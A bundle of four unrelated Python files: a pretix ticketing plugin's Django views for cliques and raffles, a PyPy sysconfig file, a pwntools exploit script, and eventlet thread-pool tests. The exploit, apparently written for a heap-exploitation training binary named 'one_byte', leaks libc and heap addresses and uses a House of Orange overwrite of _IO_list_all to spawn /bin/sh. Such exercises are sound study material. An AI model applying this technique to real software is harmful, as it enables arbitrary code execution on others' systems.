from django.utils.decorators import method_decorator
from django.utils.functional import cached_property
from django.utils.translation import gettext_lazy as _, pgettext_lazy
from django.views import View
from django.views.decorators.clickjacking import xframe_options_exempt
from django.views.generic import DeleteView, ListView, TemplateView, FormView
from django_scopes import scopes_disabled
from pretix_cliques.tasks import run_raffle, run_rejection
from pretix import settings
from pretix.base.models import Order, SubEvent, OrderPosition, OrderRefund, Event
from pretix.base.views.metrics import unauthed_response
from pretix.base.views.tasks import AsyncAction
from pretix.control.forms.widgets import Select2
from pretix.control.permissions import EventPermissionRequiredMixin
from pretix.control.views import UpdateView
from pretix.control.views.orders import OrderView
from pretix.multidomain.urlreverse import eventreverse
from pretix.presale.views import EventViewMixin
from pretix.presale.views.order import OrderDetailMixin
from .checkoutflow import CliqueCreateForm, CliqueJoinForm
from .models import Clique, OrderClique, OrderRaffleOverride
class CliqueChangePasswordForm(forms.Form):
password = forms.CharField(
max_length=190,
label=_('New clique password'),
help_text=_("Optional"),
min_length=3,
required=False,
)
def __init__(self, *args, **kwargs):
self.event = kwargs.pop('event')
super().__init__(*args, **kwargs)
@method_decorator(xframe_options_exempt, 'dispatch')
class OrderCliqueChange(EventViewMixin, OrderDetailMixin, TemplateView):
template_name = 'pretix_cliques/order_clique_change.html'
def dispatch(self, request, *args, **kwargs):
self.request = request
if not self.order:
raise Http404(_('Unknown order code or not authorized to access this order.'))
if not self.order.can_modify_answers:
messages.error(request, _('The clique for this order cannot be changed.'))
return redirect(self.get_order_url())
if self.order.status not in (Order.STATUS_PENDING, Order.STATUS_EXPIRED, Order.STATUS_PAID):
messages.error(request, _('The clique for this order cannot be changed.'))
return redirect(self.get_order_url())
return super().dispatch(request, *args, **kwargs)
@transaction.atomic
def post(self, request, *args, **kwargs):
self.request = request
mode = request.POST.get("clique_mode")
if mode == "leave":
try:
c = self.order.orderclique
c.delete()
self.order.log_action("pretix_cliques.order.left", data={
'clique': c.pk
})
messages.success(request, _('Okay, you left your clique successfully. How do you want to continue?'))
return redirect(eventreverse(self.request.event, 'plugins:pretix_cliques:event.order.clique.modify',
kwargs={
'order': self.order.code,
'secret': self.order.secret,
}))
except OrderClique.DoesNotExist:
pass
elif mode == "change":
if self.change_form.is_valid():
try:
c = self.order.orderclique
if c.is_admin:
c.clique.password = self.change_form.cleaned_data['password']
c.clique.save()
self.order.log_action("pretix_cliques.order.changed", data={
'clique': c.pk
})
messages.success(request, _('Okay, we changed the password. Make sure to tell your friends!'))
return redirect(self.get_order_url())
except OrderClique.DoesNotExist:
pass
elif mode == 'join':
if self.join_form.is_valid():
clique = self.join_form.cleaned_data['clique']
OrderClique.objects.create(
clique=clique,
order=self.order
)
self.order.log_action("pretix_cliques.order.joined", data={
'clique': clique.pk
})
messages.success(request, _('Great, we saved your changes!'))
return redirect(self.get_order_url())
elif mode == 'create':
if self.create_form.is_valid():
clique = Clique(event=self.request.event)
clique.name = self.create_form.cleaned_data['name']
clique.password = self.create_form.cleaned_data['password']
clique.save()
OrderClique.objects.create(
clique=clique,
order=self.order,
is_admin=True
)
self.order.log_action("pretix_cliques.order.created", data={
'clique': clique.pk
})
messages.success(request, _('Great, we saved your changes!'))
return redirect(self.get_order_url())
elif mode == 'none':
messages.success(request, _('Great, we saved your changes!'))
return redirect(self.get_order_url())
messages.error(self.request, _("We could not handle your input. See below for more information."))
return self.get(request, *args, **kwargs)
@cached_property
def change_form(self):
return CliqueChangePasswordForm(
event=self.request.event,
prefix='change',
data=self.request.POST if self.request.method == "POST" and self.request.POST.get(
"clique_mode") == "change" else None
)
@cached_property
def create_form(self):
return CliqueCreateForm(
event=self.request.event,
prefix='create',
data=self.request.POST if self.request.method == "POST" and self.request.POST.get(
"clique_mode") == "create" else None
)
@cached_property
def join_form(self):
return CliqueJoinForm(
event=self.request.event,
prefix='join',
data=self.request.POST if self.request.method == "POST" and self.request.POST.get(
"clique_mode") == "join" else None
)
def get_context_data(self, **kwargs):
ctx = super().get_context_data(**kwargs)
ctx['order'] = self.order
ctx['join_form'] = self.join_form
ctx['create_form'] = self.create_form
ctx['change_form'] = self.change_form
try:
c = self.order.orderclique
ctx['clique'] = c.clique
ctx['is_admin'] = c.is_admin
except OrderClique.DoesNotExist:
ctx['selected'] = self.request.POST.get("clique_mode", 'none')
return ctx
def dispatch(self, request, *args, **kwargs):
self.request = request
return super().dispatch(request, *args, **kwargs)
class ControlCliqueForm(forms.ModelForm):
class Meta:
model = OrderClique
fields = ['clique', 'is_admin']
def __init__(self, *args, **kwargs):
self.event = kwargs.pop('event')
super().__init__(*args, **kwargs)
self.fields['clique'].queryset = self.event.cliques.all()
class RaffleOverrideChange(OrderView):
permission = 'can_change_orders'
def post(self, request, *args, **kwargs):
mode = request.POST.get('mode')
if mode not in dict(OrderRaffleOverride.MODE_CHOICES):
mode = OrderRaffleOverride.MODE_NORMAL
OrderRaffleOverride.objects.update_or_create(
order=self.order,
defaults={
'mode': mode
}
)
self.order.log_action('pretix_cliques.chance.changed', data={
'mode': mode
}, user=self.request.user)
messages.success(request, _('Great, we saved your changes!'))
return redirect(self.get_order_url())
class ControlCliqueChange(OrderView):
permission = 'can_change_orders'
template_name = 'pretix_cliques/control_order_clique_change.html'
@cached_property
def form(self):
try:
instance = self.order.orderclique
except OrderClique.DoesNotExist:
instance = OrderClique(order=self.order)
return ControlCliqueForm(
data=self.request.POST if self.request.method == "POST" else None,
instance=instance,
event=self.request.event
)
def get_context_data(self, **kwargs):
ctx = super().get_context_data()
ctx['form'] = self.form
return ctx
def post(self, request, *args, **kwargs):
if self.form.is_valid():
self.form.save()
messages.success(request, _('Great, we saved your changes!'))
return redirect(self.get_order_url())
messages.error(self.request, _("We could not handle your input. See below for more information."))
return self.get(request, *args, **kwargs)
class CliqueList(EventPermissionRequiredMixin, ListView):
permission = 'can_change_orders'
template_name = 'pretix_cliques/control_list.html'
context_object_name = 'cliques'
paginate_by = 25
def get_queryset(self):
return self.request.event.cliques.all()
class CliqueForm(forms.ModelForm):
class Meta:
model = Clique
fields = ['name', 'password']
def __init__(self, *args, **kwargs):
self.event = kwargs.pop('event')
super().__init__(*args, **kwargs)
def clean_name(self):
name = self.cleaned_data.get('name')
if Clique.objects.filter(event=self.event, name=name).exclude(pk=self.instance.pk).exists():
raise forms.ValidationError(
_('Duplicate clique name'),
code='duplicate_name'
)
return name
class CliqueDetail(EventPermissionRequiredMixin, UpdateView):
permission = 'can_change_orders'
template_name = 'pretix_cliques/control_detail.html'
context_object_name = 'clique'
form_class = CliqueForm
def get_queryset(self):
return self.request.event.cliques.all()
def form_valid(self, form):
form.save()
form.instance.log_action("pretix_cliques.clique.changed", data=form.cleaned_data, user=self.request.user)
messages.success(self.request, _('Great, we saved your changes!'))
return redirect(reverse('plugins:pretix_cliques:event.cliques.list', kwargs={
'organizer': self.request.organizer.slug,
'event': self.request.event.slug,
}))
def get_context_data(self, **kwargs):
ctx = super().get_context_data(**kwargs)
ctx['orders'] = self.object.ordercliques.select_related('order')
return ctx
class CliqueDelete(EventPermissionRequiredMixin, DeleteView):
permission = 'can_change_orders'
template_name = 'pretix_cliques/control_delete.html'
context_object_name = 'clique'
def get_queryset(self):
return self.request.event.cliques.all()
def get_context_data(self, **kwargs):
ctx = super().get_context_data(**kwargs)
ctx['orders'] = self.object.ordercliques.select_related('order')
return ctx
@transaction.atomic
def delete(self, request, *args, **kwargs):
o = self.object = self.get_object()
o.log_action("pretix_cliques.clique.deleted", data={
"name": o.name
}, user=request.user)
for oc in self.object.ordercliques.select_related('order'):
oc.order.log_action("pretix_cliques.order.deleted", data={
'clique': o.pk
}, user=request.user)
oc.delete()
o.delete()
messages.success(self.request, _('The clique has been deleted.'))
return redirect(reverse('plugins:pretix_cliques:event.cliques.list', kwargs={
'organizer': self.request.organizer.slug,
'event': self.request.event.slug,
}))
class RaffleForm(forms.Form):
subevent = forms.ModelChoiceField(
SubEvent.objects.none(),
label=pgettext_lazy('subevent', 'Date'),
required=True,
)
number = forms.IntegerField(
label=_('Number of tickets to raffle'),
help_text=_('The end result can differ by as much as the size of the largest clique'),
required=True
)
max_addons = forms.IntegerField(
label=_('Maximum number of add-on products to raffle'),
help_text=_('Add-on tickets generally do not affect raffle results, but if this number of add-on products '
'was successful, additional tickets with add-on products will no longer win.'),
required=True,
initial=999999,
)
def __init__(self, *args, **kwargs):
self.event = kwargs.pop('event')
super().__init__(*args, **kwargs)
if self.event.has_subevents:
self.fields['subevent'].queryset = self.event.subevents.all()
self.fields['subevent'].widget = Select2(
attrs={
'data-inverse-dependency': '#id_all_subevents',
'data-model-select2': 'event',
'data-select2-url': reverse('control:event.subevents.select2', kwargs={
'event': self.event.slug,
'organizer': self.event.organizer.slug,
}),
'data-placeholder': pgettext_lazy('subevent', 'All dates')
}
)
self.fields['subevent'].widget.choices = self.fields['subevent'].choices
else:
del self.fields['subevent']
class RejectForm(forms.Form):
subevent = forms.ModelChoiceField(
SubEvent.objects.none(),
label=pgettext_lazy('subevent', 'Date'),
required=True,
)
def __init__(self, *args, **kwargs):
self.event = kwargs.pop('event')
super().__init__(*args, **kwargs)
if self.event.has_subevents:
self.fields['subevent'].queryset = self.event.subevents.all()
self.fields['subevent'].widget = Select2(
attrs={
'data-inverse-dependency': '#id_all_subevents',
'data-model-select2': 'event',
'data-select2-url': reverse('control:event.subevents.select2', kwargs={
'event': self.event.slug,
'organizer': self.event.organizer.slug,
}),
'data-placeholder': pgettext_lazy('subevent', 'All dates')
}
)
self.fields['subevent'].widget.choices = self.fields['subevent'].choices
else:
del self.fields['subevent']
class RaffleView(EventPermissionRequiredMixin, AsyncAction, FormView):
template_name = 'pretix_cliques/control_raffle.html'
permission = 'can_change_orders'
form_class = RaffleForm
task = run_raffle
known_errortypes = ['OrderError']
def get(self, request, *args, **kwargs):
if 'async_id' in request.GET and settings.HAS_CELERY:
return self.get_result(request)
return FormView.get(self, request, *args, **kwargs)
def get_form_kwargs(self):
k = super().get_form_kwargs()
k['event'] = self.request.event
return k
def form_valid(self, form):
return self.do(
self.request.event.pk,
subevent_id=form.cleaned_data['subevent'].pk if form.cleaned_data.get('subevent') else None,
user_id=self.request.user.pk,
raffle_size=form.cleaned_data['number'],
max_addons=form.cleaned_data['max_addons'],
)
def get_success_message(self, value):
return _('The raffle has been performed, {count} orders have been approved.').format(count=value)
def get_success_url(self, value):
return reverse('plugins:pretix_cliques:event.raffle', kwargs={
'organizer': self.request.organizer.slug,
'event': self.request.event.slug,
})
def get_error_url(self):
return reverse('plugins:pretix_cliques:event.raffle', kwargs={
'organizer': self.request.organizer.slug,
'event': self.request.event.slug,
})
def get_error_message(self, exception):
if isinstance(exception, str):
return exception
return super().get_error_message(exception)
def form_invalid(self, form):
messages.error(self.request, _('Your input was not valid.'))
return super().form_invalid(form)
class RaffleRejectView(EventPermissionRequiredMixin, AsyncAction, FormView):
template_name = 'pretix_cliques/control_raffle_reject.html'
permission = 'can_change_orders'
form_class = RejectForm
task = run_rejection
known_errortypes = ['OrderError']
def get(self, request, *args, **kwargs):
if 'async_id' in request.GET and settings.HAS_CELERY:
return self.get_result(request)
return FormView.get(self, request, *args, **kwargs)
def get_form_kwargs(self):
k = super().get_form_kwargs()
k['event'] = self.request.event
return k
def form_valid(self, form):
return self.do(
self.request.event.pk,
subevent_id=form.cleaned_data['subevent'].pk if form.cleaned_data.get('subevent') else None,
user_id=self.request.user.pk,
)
def get_success_message(self, value):
return _('{count} orders have been rejected.').format(count=value)
def get_success_url(self, value):
return reverse('plugins:pretix_cliques:event.raffle.reject', kwargs={
'organizer': self.request.organizer.slug,
'event': self.request.event.slug,
})
def get_error_url(self):
return reverse('plugins:pretix_cliques:event.raffle.reject', kwargs={
'organizer': self.request.organizer.slug,
'event': self.request.event.slug,
})
def get_error_message(self, exception):
if isinstance(exception, str):
return exception
return super().get_error_message(exception)
def form_invalid(self, form):
messages.error(self.request, _('Your input was not valid.'))
return super().form_invalid(form)
class StatsMixin:
def get_ticket_stats(self, event):
qs = OrderPosition.objects.filter(
order__event=event,
).annotate(
has_clique=Exists(OrderClique.objects.filter(order_id=OuterRef('order_id')))
)
return [
{
'id': 'tickets_total',
'label': _('All tickets, total'),
'qs': qs.filter(order__status=Order.STATUS_PENDING, order__require_approval=True),
'qs_cliq': True
},
{
'id': 'tickets_registered',
'label': _('Tickets registered for raffle'),
'qs': qs.filter(order__status=Order.STATUS_PENDING, order__require_approval=True),
'qs_cliq': True
},
{
'id': 'tickets_approved',
'label': _('Tickets in approved orders (regardless of payment status)'),
'qs': qs.filter(order__require_approval=False),
'qs_cliq': True
},
{
'id': 'tickets_paid',
'label': _('Tickets in paid orders'),
'qs': qs.filter(order__require_approval=False, order__status=Order.STATUS_PAID),
},
{
'id': 'tickets_pending',
'label': _('Tickets in pending orders'),
'qs': qs.filter(order__require_approval=False, order__status=Order.STATUS_PENDING),
},
{
'id': 'tickets_canceled',
'label': _('Tickets in canceled orders (except the ones not chosen in raffle)'),
'qs': qs.filter(order__require_approval=False, order__status=Order.STATUS_CANCELED),
},
{
'id': 'tickets_canceled_refunded',
'label': _('Tickets in canceled and at least partially refunded orders'),
'qs': qs.annotate(
has_refund=Exists(OrderRefund.objects.filter(order_id=OuterRef('order_id'), state__in=[OrderRefund.REFUND_STATE_DONE]))
).filter(
price__gt=0, order__status=Order.STATUS_CANCELED, has_refund=True
),
},
{
'id': 'tickets_denied',
'label': _('Tickets denied (not chosen in raffle)'),
'qs': qs.filter(order__require_approval=True, order__status=Order.STATUS_CANCELED),
'qs_cliq': True
},
]
class StatsView(StatsMixin, EventPermissionRequiredMixin, TemplateView):
template_name = 'pretix_cliques/control_stats.html'
permission = 'can_view_orders'
def get_context_data(self, **kwargs):
def qs_by_item(qs):
d = defaultdict(lambda: defaultdict(lambda: 0))
for r in qs:
d[r['item']][r['subevent']] = r['c']
return d
def qs_by_clique(qs):
d = defaultdict(lambda: defaultdict(lambda: 0))
for r in qs:
d[r['has_clique']][r['subevent']] = r['c']
return d
def qs_by_unique_clique(qs):
d = defaultdict(lambda: defaultdict(lambda: 0))
for r in qs:
d[r['has_clique']][r['subevent']] = r['cc']
return d
def qs_by_subevent(qs):
d = defaultdict(lambda: defaultdict(lambda: 0))
for r in qs:
d[r['subevent']][r['item']] = r['c']
return d
ctx = super().get_context_data()
ctx['subevents'] = self.request.event.subevents.all()
ctx['items'] = self.request.event.items.all()
ctx['ticket_stats'] = []
for d in self.get_ticket_stats(self.request.event):
qs = list(d['qs'].order_by().values('subevent', 'item').annotate(c=Count('*')))
if d.get('qs_cliq'):
qsc = list(d['qs'].order_by().values('subevent', 'has_clique').annotate(c=Count('*'), cc=Count('order__orderclique__clique', distinct=True)))
c1 = qs_by_clique(qsc)
c2 = qs_by_unique_clique(qsc)
else:
c1 = c2 = None
ctx['ticket_stats'].append((
d['label'],
qs_by_item(qs),
qs_by_subevent(qs),
c1,
c2
))
return ctx
class MetricsView(StatsMixin, View):
@scopes_disabled()
def get(self, request, organizer, event):
event = get_object_or_404(Event, slug=event, organizer__slug=organizer)
if not settings.METRICS_ENABLED:
return unauthed_response()
# check if the user is properly authorized:
if "Authorization" not in request.headers:
return unauthed_response()
method, credentials = request.headers["Authorization"].split(" ", 1)
if method.lower() != "basic":
return unauthed_response()
user, passphrase = base64.b64decode(credentials.strip()).decode().split(":", 1)
if not hmac.compare_digest(user, settings.METRICS_USER):
return unauthed_response()
if not hmac.compare_digest(passphrase, settings.METRICS_PASSPHRASE):
return unauthed_response()
# ok, the request passed the authentication-barrier, let's hand out the metrics:
m = defaultdict(dict)
for d in self.get_ticket_stats(event):
if d.get('qs_cliq'):
qs = d['qs'].order_by().values('subevent', 'item', 'has_clique').annotate(c=Count('*'), cc=Count('order__orderclique__clique', distinct=True))
for r in qs:
m[d['id']]['{item="%s",subevent="%s",hasclique="%s"}' % (r['item'], r['subevent'], r['has_clique'])] = r['c']
if r['cc']:
m[d['id'] + '_unique_cliques']['{item="%s",subevent="%s"}' % (r['item'], r['subevent'])] = r['cc']
else:
qs = d['qs'].order_by().values('subevent', 'item').annotate(c=Count('*'))
for r in qs:
m[d['id']]['{item="%s",subevent="%s"}' % (r['item'], r['subevent'])] = r['c']
output = []
for metric, sub in m.items():
for label, value in sub.items():
output.append("{}{} {}".format(metric, label, str(value)))
content = "\n".join(output) + "\n"
return HttpResponse(content)
|
the-stack_0_25250
|
import _imp
import os
import sys
import struct
from shutil import which
so_ext = _imp.extension_suffixes()[0]
pydot = '%d.%d' % sys.version_info[:2]
build_time_vars = {
'ABIFLAGS': '',
# SOABI is PEP 3149 compliant, but CPython3 has so_ext.split('.')[1]
# ("ABI tag"-"platform tag") where this is ABI tag only. Wheel 0.34.2
# depends on this value, so don't make it CPython compliant without
# checking wheel: it uses pep425tags.get_abi_tag with special handling
# for CPython
"SOABI": '-'.join(so_ext.split('.')[1].split('-')[:2]),
"SO": so_ext, # deprecated in Python 3, for backward compatibility
'MULTIARCH': sys.implementation._multiarch,
'CC': "cc -pthread",
'CXX': "c++ -pthread",
'OPT': "-DNDEBUG -O2",
'CFLAGS': "-DNDEBUG -O2",
'CCSHARED': "-fPIC",
'LDFLAGS': "-Wl,-Bsymbolic-functions",
'LDSHARED': "cc -pthread -shared -Wl,-Bsymbolic-functions",
'EXT_SUFFIX': so_ext,
'SHLIB_SUFFIX': ".so",
'AR': "ar",
'ARFLAGS': "rc",
'EXE': "",
'VERSION': pydot,
'LDVERSION': pydot,
'Py_DEBUG': 0, # cpyext never uses this
'Py_ENABLE_SHARED': 0, # if 1, will add python so to link like -lpython3.7
'SIZEOF_VOID_P': struct.calcsize("P"),
}
# LIBDIR should point to where the libpypy3.9-c.so file lives, on CPython
# it points to "mybase/lib". But that would require rethinking the PyPy
# packaging process which copies pypy3 and libpypy3.9-c.so to the
# "mybase/bin" directory. Only when making a portable build (the default
# for the linux buildbots) is there even a "mybase/lib" created, even so
# the mybase/bin layout is left untouched.
mybase = sys.base_prefix
if sys.platform == 'win32':
build_time_vars['LDLIBRARY'] = 'libpypy3.9-c.dll'
build_time_vars['INCLUDEPY'] = os.path.join(mybase, 'include')
build_time_vars['LIBDIR'] = mybase
else:
build_time_vars['LDLIBRARY'] = 'libpypy3.9-c.so'
build_time_vars['INCLUDEPY'] = os.path.join(mybase, 'include', 'pypy' + pydot)
build_time_vars['LIBDIR'] = os.path.join(mybase, 'bin')
# try paths relative to sys.base_prefix first
tzpaths = [
os.path.join(mybase, 'share', 'zoneinfo'),
os.path.join(mybase, 'lib', 'zoneinfo'),
os.path.join(mybase, 'share', 'lib', 'zoneinfo'),
os.path.join(mybase, '..', 'etc', 'zoneinfo'),
]
# add absolute system paths if sys.base_prefix != "/usr"
# (then we'd be adding duplicates)
if mybase != '/usr':
tzpaths.extend([
'/usr/share/zoneinfo',
'/usr/lib/zoneinfo',
'/usr/share/lib/zoneinfo',
'/etc/zoneinfo',
])
build_time_vars['TZPATH'] = ':'.join(tzpaths)
if which("gcc"):
build_time_vars.update({
"CC": "gcc -pthread",
"GNULD": "yes",
"LDSHARED": "gcc -pthread -shared" + " " + build_time_vars["LDFLAGS"] ,
})
if which("g++"):
build_time_vars["CXX"] = "g++ -pthread"
if sys.platform[:6] == "darwin":
# Fix this if we ever get M1 support
arch = 'x86_64'
build_time_vars['CC'] += ' -arch %s' % (arch,)
build_time_vars["LDFLAGS"] = "-undefined dynamic_lookup"
build_time_vars["LDSHARED"] = build_time_vars['CC'] + " -shared " + build_time_vars["LDFLAGS"]
build_time_vars['LDLIBRARY'] = 'libpypy3.9-c.dylib'
# scikit-build checks this, it is left over from the NextStep rld linker
build_time_vars['WITH_DYLD'] = 1
if "CXX" in build_time_vars:
build_time_vars['CXX'] += ' -arch %s' % (arch,)
# This was added to solve problems that may have been
# solved elsewhere. Can we remove it? See cibuildwheel PR 185 and
# pypa/wheel. Need to check: interaction with build_cffi_imports.py
#
# In any case, keep this in sync with DARWIN_VERSION_MIN in
# rpython/translator/platform/darwin.py and Lib/_osx_support.py
build_time_vars['MACOSX_DEPLOYMENT_TARGET'] = '10.9'
|
the-stack_0_25251
|
#!/usr/bin/python3
from pwn import *
elf = context.binary = ELF("one_byte")
libc = elf.libc
gs = '''
continue
'''
def start():
if args.GDB:
return gdb.debug(elf.path, gdbscript=gs)
else:
return process(elf.path)
# Index of allocated chunks.
index = 0
# Select the "malloc" option.
# Returns chunk index.
def malloc():
global index
io.sendthen("> ", "1")
index += 1
return index - 1
# Select the "free" option; send index.
def free(index):
io.send("2")
io.sendafter("index: ", f"{index}")
io.recvuntil("> ")
# Select the "edit" option; send index & data.
def edit(index, data):
io.send("3")
io.sendafter("index: ", f"{index}")
io.sendafter("data: ", data)
io.recvuntil("> ")
# Select the "read" option; read 0x58 bytes.
def read(index):
io.send("4")
io.sendafter("index: ", f"{index}")
r = io.recv(0x58)
io.recvuntil("> ")
return r
io = start()
io.recvuntil("> ")
io.timeout = 0.1
# =============================================================================
# Request 5 chunks
chunk_A = malloc()
chunk_B = malloc()
chunk_C = malloc()
chunk_D = malloc()
chunk_E = malloc()
# Edit chunk A to overwrite the size field of chunk B
edit(chunk_A, b"Y"*0x58 + p64(0x60 * 2 + 0x1))
# Free chunk B into the unsortedbin (0xc0 size)
free(chunk_B)
# Allocate 0x60-sized chunk. This will split chunk B in half
# due to remaindering process.
# The allocated chunk will be placed right after chunk A but before
# our unsortedbin'ed chunk B.
chunk_B = malloc()
# Unsortedbin'ed half of chunk B has became chunk C.
# Now we can read fd and bk addresses (pointing to the unsortedbin),
# effectively leaking libc address.
unsortedbin_address = u64(read(chunk_C)[:8])
unsortedbin_libc_offset = libc.sym.main_arena + 88
libc.address = unsortedbin_address - unsortedbin_libc_offset
log.info(f"libc @ {hex(libc.address)}")
# Request unsortedbin'ed half of chunk B
chunk_C2 = malloc()
# Put chunk A into the fastbin
free(chunk_A)
# Put chunk C2 into the fastbin
free(chunk_C2)
# Chunk C2 now has an fd pointing to the start of chunk A,
# which is also a heap start address.
# We can read chunk C2 using chunk C to leak it.
heap = u64(read(chunk_C)[:8])
log.info(f"heap @ {hex(heap)}")
# Revert the heap to its initial state
chunk_C = malloc()
chunk_A = malloc()
# =============================================================================
# Edit chunk A to overwrite the size field of chunk B
edit(chunk_A, b"Y"*0x58 + p64(0x60 * 2 + 0x1))
# Free chunk B into the unsortedbin (0xc0 size)
free(chunk_B)
# Remainder chunk B again
chunk_B = malloc()
# Unsortedbin'ed half of chunk B has became chunk C.
# Now we can leverage the House of Orange technique
# 0xb0 is a smallbin size _IO_list_all targets + prev_inuse flag
# (determined from main arena layout)
edit(chunk_B, p64(0) * 10 + b"/bin/sh\x00" + p8(0xb1))
edit(chunk_C, p64(0xdeadbeef) + p64(libc.sym._IO_list_all - 0x10) + p64(1) + p64(2))
# chunk D is null, so the mode is already set to 0
edit(chunk_E, p64(libc.sym.system) + p64(heap + 0x178))
# Check:
# pwndbg> p (struct _IO_FILE_plus) *0x5555557570c0
# pwndbg> p *$1.vtable
# Trigger the attack
malloc()
# =============================================================================
io.interactive()
|
the-stack_0_25252
|
# Copyright (c) 2007, Linden Research, Inc.
# Copyright (c) 2007, IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import gc
import random
import re
import time
import eventlet
from eventlet import tpool
import six
import tests
one = 1
two = 2
three = 3
none = None
def noop():
pass
def raise_exception():
raise RuntimeError("hi")
class TestTpool(tests.LimitedTestCase):
def setUp(self):
super(TestTpool, self).setUp()
def tearDown(self):
tpool.killall()
super(TestTpool, self).tearDown()
@tests.skip_with_pyevent
def test_wrap_tuple(self):
my_tuple = (1, 2)
prox = tpool.Proxy(my_tuple)
self.assertEqual(prox[0], 1)
self.assertEqual(prox[1], 2)
self.assertEqual(len(my_tuple), 2)
@tests.skip_with_pyevent
def test_wrap_string(self):
my_object = "whatever"
prox = tpool.Proxy(my_object)
self.assertEqual(str(my_object), str(prox))
self.assertEqual(len(my_object), len(prox))
self.assertEqual(my_object.join(['a', 'b']), prox.join(['a', 'b']))
@tests.skip_with_pyevent
def test_wrap_uniterable(self):
prox = tpool.Proxy([])
def index():
prox[0]
def key():
prox['a']
self.assertRaises(IndexError, index)
self.assertRaises(TypeError, key)
@tests.skip_with_pyevent
def test_wrap_dict(self):
my_object = {'a': 1}
prox = tpool.Proxy(my_object)
self.assertEqual('a', list(prox.keys())[0])
self.assertEqual(1, prox['a'])
self.assertEqual(str(my_object), str(prox))
self.assertEqual(repr(my_object), repr(prox))
@tests.skip_with_pyevent
def test_wrap_module_class(self):
prox = tpool.Proxy(re)
self.assertEqual(tpool.Proxy, type(prox))
exp = prox.compile('(.)(.)(.)')
self.assertEqual(exp.groups, 3)
assert repr(prox.compile)
@tests.skip_with_pyevent
def test_wrap_eq(self):
prox = tpool.Proxy(re)
exp1 = prox.compile('.')
exp2 = prox.compile(exp1.pattern)
self.assertEqual(exp1, exp2)
exp3 = prox.compile('/')
assert exp1 != exp3
@tests.skip_with_pyevent
def test_wrap_ints(self):
p = tpool.Proxy(4)
assert p == 4
@tests.skip_with_pyevent
def test_wrap_hash(self):
prox1 = tpool.Proxy('' + 'A')
prox2 = tpool.Proxy('A' + '')
assert prox1 == 'A'
assert 'A' == prox2
# assert prox1 == prox2 FIXME - could __eq__ unwrap rhs if it is other proxy?
self.assertEqual(hash(prox1), hash(prox2))
proxList = tpool.Proxy([])
self.assertRaises(TypeError, hash, proxList)
@tests.skip_with_pyevent
def test_wrap_nonzero(self):
prox = tpool.Proxy(re)
exp1 = prox.compile('.')
assert bool(exp1)
prox2 = tpool.Proxy([1, 2, 3])
assert bool(prox2)
@tests.skip_with_pyevent
def test_multiple_wraps(self):
prox1 = tpool.Proxy(re)
prox2 = tpool.Proxy(re)
prox1.compile('.')
x2 = prox1.compile('.')
del x2
prox2.compile('.')
@tests.skip_with_pyevent
def test_wrap_getitem(self):
prox = tpool.Proxy([0, 1, 2])
self.assertEqual(prox[0], 0)
@tests.skip_with_pyevent
def test_wrap_setitem(self):
prox = tpool.Proxy([0, 1, 2])
prox[1] = 2
self.assertEqual(prox[1], 2)
@tests.skip_with_pyevent
def test_wrap_iterator(self):
self.reset_timeout(2)
prox = tpool.Proxy(range(10))
result = []
for i in prox:
result.append(i)
self.assertEqual(list(range(10)), result)
@tests.skip_with_pyevent
def test_wrap_iterator2(self):
self.reset_timeout(5) # might take a while due to imprecise sleeping
def foo():
import time
for x in range(2):
yield x
time.sleep(0.001)
counter = [0]
def tick():
for i in six.moves.range(20000):
counter[0] += 1
if counter[0] % 20 == 0:
eventlet.sleep(0.0001)
else:
eventlet.sleep()
gt = eventlet.spawn(tick)
previtem = 0
for item in tpool.Proxy(foo()):
assert item >= previtem
# make sure the tick happened at least a few times so that we know
# that our iterations in foo() were actually tpooled
assert counter[0] > 10, counter[0]
gt.kill()
@tests.skip_with_pyevent
def test_raising_exceptions(self):
prox = tpool.Proxy(re)
def nofunc():
prox.never_name_a_function_like_this()
self.assertRaises(AttributeError, nofunc)
from tests import tpool_test
prox = tpool.Proxy(tpool_test)
self.assertRaises(RuntimeError, prox.raise_exception)
@tests.skip_with_pyevent
def test_variable_and_keyword_arguments_with_function_calls(self):
import optparse
parser = tpool.Proxy(optparse.OptionParser())
parser.add_option('-n', action='store', type='string', dest='n')
opts, args = parser.parse_args(["-nfoo"])
self.assertEqual(opts.n, 'foo')
@tests.skip_with_pyevent
def test_contention(self):
from tests import tpool_test
prox = tpool.Proxy(tpool_test)
pile = eventlet.GreenPile(4)
pile.spawn(lambda: self.assertEqual(prox.one, 1))
pile.spawn(lambda: self.assertEqual(prox.two, 2))
pile.spawn(lambda: self.assertEqual(prox.three, 3))
results = list(pile)
self.assertEqual(len(results), 3)
@tests.skip_with_pyevent
def test_timeout(self):
blocking = eventlet.patcher.original('time')
eventlet.Timeout(0.1, eventlet.Timeout())
try:
tpool.execute(blocking.sleep, 0.3)
assert False, 'Expected Timeout'
except eventlet.Timeout:
pass
@tests.skip_with_pyevent
def test_killall(self):
tpool.killall()
tpool.setup()
@tests.skip_with_pyevent
def test_killall_remaining_results(self):
semaphore = eventlet.Event()
def native_fun():
time.sleep(.5)
def gt_fun():
semaphore.send(None)
tpool.execute(native_fun)
gt = eventlet.spawn(gt_fun)
semaphore.wait()
tpool.killall()
gt.wait()
@tests.skip_with_pyevent
def test_autowrap(self):
x = tpool.Proxy({'a': 1, 'b': 2}, autowrap=(int,))
assert isinstance(x.get('a'), tpool.Proxy)
assert not isinstance(x.items(), tpool.Proxy)
# attributes as well as callables
from tests import tpool_test
x = tpool.Proxy(tpool_test, autowrap=(int,))
assert isinstance(x.one, tpool.Proxy)
assert not isinstance(x.none, tpool.Proxy)
@tests.skip_with_pyevent
def test_autowrap_names(self):
x = tpool.Proxy({'a': 1, 'b': 2}, autowrap_names=('get',))
assert isinstance(x.get('a'), tpool.Proxy)
assert not isinstance(x.items(), tpool.Proxy)
from tests import tpool_test
x = tpool.Proxy(tpool_test, autowrap_names=('one',))
assert isinstance(x.one, tpool.Proxy)
assert not isinstance(x.two, tpool.Proxy)
@tests.skip_with_pyevent
def test_autowrap_both(self):
from tests import tpool_test
x = tpool.Proxy(tpool_test, autowrap=(int,), autowrap_names=('one',))
assert isinstance(x.one, tpool.Proxy)
# violating the abstraction to check that we didn't double-wrap
assert not isinstance(x._obj, tpool.Proxy)
@tests.skip_with_pyevent
def test_callable(self):
